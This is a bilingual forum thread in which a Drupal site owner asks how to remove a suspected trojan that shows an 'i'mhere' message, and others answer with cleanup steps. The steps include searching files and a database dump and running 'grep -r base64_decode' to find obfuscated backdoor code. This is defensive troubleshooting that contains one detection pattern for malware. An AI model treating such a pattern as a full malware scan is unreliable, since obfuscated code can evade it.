帮助解决潜在的木马通过网站的问题
因此,我非常确定我的网站已感染某种特洛伊木马或病毒,并将其自身附加到网站内的脚本中。每次我尝试更新基于 Drupal 的网站时,都会出现一个白屏,上面显示愚蠢的“我在这里”消息。重新加载后,更改将生效,但我不知道保存更改后会做什么。仅在管理网站、IE 发布新内容、激活/停用模块等时才会弹出。
问题是,我不知道如何或在哪里删除它。源代码未引用任何恶意代码。这不是我在尝试找到此问题的答案时发现的 iFrame 链接类型的木马。
我尝试过的事情:
- 多次扫描计算机是否有病毒(据说这些东西会攻击不安全的 FTP 数据并劫持您的客户端以上传恶意代码)
- 更改 FTP 凭据
- 更改网站后端的管理员用户密码(Drupal 登录)
- 已更新 Drupal
到目前为止,没有任何效果,我已经无计可施,试图解决这个问题。任何正确方向的提示将不胜感激。
So I'm pretty sure my site's been infected with some kind of trojan or virus that attached itself to the scripting within the site. Every time I try and update my Drupal-based site, I get a white screen with this stupid "i'mhere" message. Upon reload, the changes will take affect but I don't know what this is doing once changes are saved. This only pops up while adminstering the site, I.E. posting new content, activating/deactivating modules etc.
Problem is, I haven't the faintest idea how or where to go to remove this. The source code doesn't make reference to any malicious code. It isn't the iFrame link kind of trojan that I've seen brought up through trying to find an answer to this problem.
Things I've tried:
-Scanned computer multiple times for virus (supposedly these things attack insecure FTP data & hijack your client to upload malicious code)
-Changed FTP credentials
-Changed admin user passwords to the backend of the site (Drupal login)
-Updated Drupal
Nothing's worked so far and I'm at my wit's end trying to figure this out. Any tips in the right direction would be greatly appreciated.
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(2)
假设问题确实是 Drupal,首先检查模块中某处是否有某些代码在表单提交期间触发。如果您有 shell 访问权限并且它是基于 Unix/Linux/etc. 的服务器,请导航到 Drupal 目录并运行:
这将告诉您它是否存在于代码中以及哪个文件包含它。如果它是一个模块(可能),请将其禁用,然后查看是否有更新或自行修改。
如果代码中没有,请检查您的数据库。创建数据库转储,然后运行:
其中databasedump.sql 是您刚刚创建的数据库转储的名称。这至少应该让您大致了解数据存在于哪个表中。然后,您可以决定如何继续:从以前的备份恢复、删除有问题的数据等。
如果两者都不存在,则可能是当地的。与其他人核实一下,看看他们是否也遇到这种情况。
如果它不是本地的,那么您遇到了一些非常令人讨厌的事情,并且希望其他人对您可以检查的内容有一些其他想法。 :)
Assuming the problem is really Drupal, first check to see if there's some code in a module somewhere firing during a form submit. If you have shell access and it's a Unix/Linux/etc.-based server, navigate to the Drupal directory and run:
This will tell you if it exists in code and what file contains it. If it's a module (likely), disable it and either see if there's an update or modify it yourself.
If it's not in code, check your database. Create a dump of your database, and run:
Where databasedump.sql is the name of the database dump you just created. This should at least give you a general idea of what table the data exists in. Then, you can decide how you want to proceed: restore from a previous backup, delete the offending data, etc.
If it's not in either, it might be local. Check with others to see if it's occurring for them.
If it's not local, you've got something really nasty and hopefully someone else has some other ideas on what you can check. :)
以下是一些可能有用的工具列表,可以帮助您缓解、减少或预防病毒感染:
它直接来自臭名昭著的后门恶意软件,如 这篇 stackoverflow 文章。
您可能需要通过运行以下简单命令来手动搜索病毒的其他实例:
[~] grep -r "base64_decode" .,如 thegothicparty.com 上这篇 RAT 感染文章中的建议:
http://thegothicparty.com/dev/article/server-side-virus -老鼠/
Here are a list of potentially useful tools which can help you alleviate, reduce or prevent a virus infection:
It is coming straight out of an infamous backdoor malicious software, described on this stackoverflow article.
You may want to manually search for other instances of the virus by running this simple command:
[~] grep -r "base64_decode" .as suggested in this RAT infection article on thegothicparty.com:
http://thegothicparty.com/dev/article/server-side-virus-rat/